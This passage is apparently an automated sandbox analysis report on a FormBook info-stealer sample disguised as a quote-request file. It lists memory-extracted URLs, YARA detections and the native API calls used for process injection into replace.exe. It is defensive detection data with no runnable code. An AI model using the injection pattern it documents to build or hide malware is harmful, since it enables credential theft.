                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/el-pasto-filtras/
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/neribotas-svetainiu-talpinimas/
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/profesionalus-hostingas/
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/sertifikatai/
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/svetainiu-kurimo-irankis/
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/talpinimo-planai/
                Source: replace.exe, 0000000F.00000002.3741778004.0000000003854000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 0000000F.00000002.3743530220.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.0000000003034000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.1866468648.0000000039D54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/vps-serveriai/
                Source: ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.valentinaetommaso.it/page-not-found-404/
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campa
                Source: replace.exe, 0000000F.00000002.3741778004.0000000004B2C000.00000004.10000000.00040000.00000000.sdmp, ZkvvIsytMpWTrpZoKvbY.exe, 00000010.00000002.3739710845.000000000430C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.webnode.it/?utm_source=text&utm_medium=footer&utm_content=wnd2&utm_campaign=signature

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RFQ-25251.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RFQ-25251.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1577459503.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3741723282.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3739964575.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3739911328.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3739750854.00000000028B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1578501671.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 7.2.RFQ-25251.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 7.2.RFQ-25251.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000F.00000002.3727690758.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.1577459503.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000010.00000002.3741723282.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.1573562634.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000F.00000002.3739964575.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000F.00000002.3739911328.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.3739750854.00000000028B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.1578501671.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: RFQ-25251.scr.exe
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0042B233 NtClose,7_2_0042B233
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2B60 NtClose,LdrInitializeThunk,7_2_012B2B60
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_012B2DF0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_012B2C70
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B35C0 NtCreateMutant,LdrInitializeThunk,7_2_012B35C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B4340 NtSetContextThread,7_2_012B4340
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B4650 NtSuspendThread,7_2_012B4650
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2BA0 NtEnumerateValueKey,7_2_012B2BA0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2B80 NtQueryInformationFile,7_2_012B2B80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2BE0 NtQueryValueKey,7_2_012B2BE0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2BF0 NtAllocateVirtualMemory,7_2_012B2BF0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2AB0 NtWaitForSingleObject,7_2_012B2AB0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2AF0 NtWriteFile,7_2_012B2AF0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2AD0 NtReadFile,7_2_012B2AD0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2D30 NtUnmapViewOfSection,7_2_012B2D30
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2D00 NtSetInformationFile,7_2_012B2D00
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2D10 NtMapViewOfSection,7_2_012B2D10
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2DB0 NtEnumerateKey,7_2_012B2DB0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2DD0 NtDelayExecution,7_2_012B2DD0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2C00 NtQueryInformationProcess,7_2_012B2C00
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2C60 NtCreateKey,7_2_012B2C60
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2CA0 NtQueryInformationToken,7_2_012B2CA0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2CF0 NtOpenProcess,7_2_012B2CF0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2CC0 NtQueryVirtualMemory,7_2_012B2CC0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2F30 NtCreateSection,7_2_012B2F30
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2F60 NtCreateProcessEx,7_2_012B2F60
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2FA0 NtQuerySection,7_2_012B2FA0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2FB0 NtResumeThread,7_2_012B2FB0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2F90 NtProtectVirtualMemory,7_2_012B2F90
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2FE0 NtCreateFile,7_2_012B2FE0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2E30 NtWriteVirtualMemory,7_2_012B2E30
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2EA0 NtAdjustPrivilegesToken,7_2_012B2EA0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2E80 NtReadVirtualMemory,7_2_012B2E80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B2EE0 NtQueueApcThread,7_2_012B2EE0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B3010 NtOpenDirectoryObject,7_2_012B3010
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B3090 NtSetValueKey,7_2_012B3090
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B39B0 NtGetContextThread,7_2_012B39B0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B3D10 NtOpenProcessToken,7_2_012B3D10
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B3D70 NtOpenThread,7_2_012B3D70
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB4340 NtSetContextThread,LdrInitializeThunk,15_2_02EB4340
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB4650 NtSuspendThread,LdrInitializeThunk,15_2_02EB4650
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2AF0 NtWriteFile,LdrInitializeThunk,15_2_02EB2AF0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2AD0 NtReadFile,LdrInitializeThunk,15_2_02EB2AD0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2BE0 NtQueryValueKey,LdrInitializeThunk,15_2_02EB2BE0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_02EB2BF0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2BA0 NtEnumerateValueKey,LdrInitializeThunk,15_2_02EB2BA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2B60 NtClose,LdrInitializeThunk,15_2_02EB2B60
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2EE0 NtQueueApcThread,LdrInitializeThunk,15_2_02EB2EE0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2E80 NtReadVirtualMemory,LdrInitializeThunk,15_2_02EB2E80
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2FE0 NtCreateFile,LdrInitializeThunk,15_2_02EB2FE0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2FB0 NtResumeThread,LdrInitializeThunk,15_2_02EB2FB0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2F30 NtCreateSection,LdrInitializeThunk,15_2_02EB2F30
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2CA0 NtQueryInformationToken,LdrInitializeThunk,15_2_02EB2CA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2C60 NtCreateKey,LdrInitializeThunk,15_2_02EB2C60
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_02EB2C70
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_02EB2DF0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2DD0 NtDelayExecution,LdrInitializeThunk,15_2_02EB2DD0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2D30 NtUnmapViewOfSection,LdrInitializeThunk,15_2_02EB2D30
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2D10 NtMapViewOfSection,LdrInitializeThunk,15_2_02EB2D10
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB35C0 NtCreateMutant,LdrInitializeThunk,15_2_02EB35C0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB39B0 NtGetContextThread,LdrInitializeThunk,15_2_02EB39B0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2AB0 NtWaitForSingleObject,15_2_02EB2AB0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2B80 NtQueryInformationFile,15_2_02EB2B80
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2EA0 NtAdjustPrivilegesToken,15_2_02EB2EA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2E30 NtWriteVirtualMemory,15_2_02EB2E30
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2FA0 NtQuerySection,15_2_02EB2FA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2F90 NtProtectVirtualMemory,15_2_02EB2F90
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2F60 NtCreateProcessEx,15_2_02EB2F60
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2CF0 NtOpenProcess,15_2_02EB2CF0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2CC0 NtQueryVirtualMemory,15_2_02EB2CC0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2C00 NtQueryInformationProcess,15_2_02EB2C00
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2DB0 NtEnumerateKey,15_2_02EB2DB0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB2D00 NtSetInformationFile,15_2_02EB2D00
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB3090 NtSetValueKey,15_2_02EB3090
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB3010 NtOpenDirectoryObject,15_2_02EB3010
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB3D70 NtOpenThread,15_2_02EB3D70
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_02EB3D10 NtOpenProcessToken,15_2_02EB3D10
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004C7AC0 NtCreateFile,15_2_004C7AC0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004C7C20 NtReadFile,15_2_004C7C20
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004C7D10 NtDeleteFile,15_2_004C7D10
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004C7DA0 NtClose,15_2_004C7DA0
                Source: C:\Windows\SysWOW64\replace.exeCode function: 15_2_004C7F00 NtAllocateVirtualMemory,15_2_004C7F00
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_015DDDD40_2_015DDDD4
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_078A46850_2_078A4685
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_078A46900_2_078A4690
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_078AF5280_2_078AF528
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_078A4E180_2_078A4E18
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_078A4E130_2_078A4E13
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_0810CE280_2_0810CE28
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_0810F8B00_2_0810F8B0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_08107A300_2_08107A30
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_08109C680_2_08109C68
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_08107E680_2_08107E68
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_08100F440_2_08100F44
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_08100F480_2_08100F48
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_081091080_2_08109108
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_081075D80_2_081075D8
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 0_2_078AB7D80_2_078AB7D8
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_004011907_2_00401190
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_004032107_2_00403210
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_004023137_2_00402313
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_004023207_2_00402320
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_004025107_2_00402510
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0040FD1A7_2_0040FD1A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0040FD237_2_0040FD23
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0042D6737_2_0042D673
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_004166C37_2_004166C3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_004166BE7_2_004166BE
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0040FF437_2_0040FF43
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_004027507_2_00402750
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0040DFC37_2_0040DFC3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012701007_2_01270100
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131A1187_2_0131A118
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013081587_2_01308158
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013341A27_2_013341A2
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013401AA7_2_013401AA
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013381CC7_2_013381CC
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013120007_2_01312000
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133A3527_2_0133A352
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013403E67_2_013403E6
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128E3F07_2_0128E3F0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013202747_2_01320274
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013002C07_2_013002C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012805357_2_01280535
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013405917_2_01340591
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013244207_2_01324420
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013324467_2_01332446
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0132E4F67_2_0132E4F6
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012807707_2_01280770
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A47507_2_012A4750
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127C7C07_2_0127C7C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129C6E07_2_0129C6E0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012969627_2_01296962
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012829A07_2_012829A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0134A9A67_2_0134A9A6
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128A8407_2_0128A840
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012828407_2_01282840
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012668B87_2_012668B8
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012AE8F07_2_012AE8F0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133AB407_2_0133AB40
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01336BD77_2_01336BD7
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127EA807_2_0127EA80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128AD007_2_0128AD00
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131CD1F7_2_0131CD1F
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01298DBF7_2_01298DBF
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0127ADE07_2_0127ADE0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280C007_2_01280C00
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01320CB57_2_01320CB5
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01270CF27_2_01270CF2
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01322F307_2_01322F30
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012C2F287_2_012C2F28
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012A0F307_2_012A0F30
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012F4F407_2_012F4F40
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012FEFA07_2_012FEFA0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128CFE07_2_0128CFE0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01272FC87_2_01272FC8
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133EE267_2_0133EE26
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01280E597_2_01280E59
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133CE937_2_0133CE93
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_01292E907_2_01292E90
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133EEDB7_2_0133EEDB
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012B516C7_2_012B516C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126F1727_2_0126F172
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0134B16B7_2_0134B16B
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0128B1B07_2_0128B1B0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133F0E07_2_0133F0E0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013370E97_2_013370E9
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012870C07_2_012870C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0132F0CC7_2_0132F0CC
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133132D7_2_0133132D
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0126D34C7_2_0126D34C
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012C739A7_2_012C739A
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012852A07_2_012852A0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013212ED7_2_013212ED
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129B2C07_2_0129B2C0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013375717_2_01337571
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0131D5B07_2_0131D5B0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013495C37_2_013495C3
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133F43F7_2_0133F43F
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012714607_2_01271460
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133F7B07_2_0133F7B0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012717EC7_2_012717EC
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012C56307_2_012C5630
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013316CC7_2_013316CC
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_013159107_2_01315910
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012899507_2_01289950
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129B9507_2_0129B950
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012ED8007_2_012ED800
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012838E07_2_012838E0
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0133FB767_2_0133FB76
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_0129FB807_2_0129FB80
                Source: C:\Users\user\Desktop\RFQ-25251.scr.exeCode function: 7_2_012BDBF97_2_012BDBF9
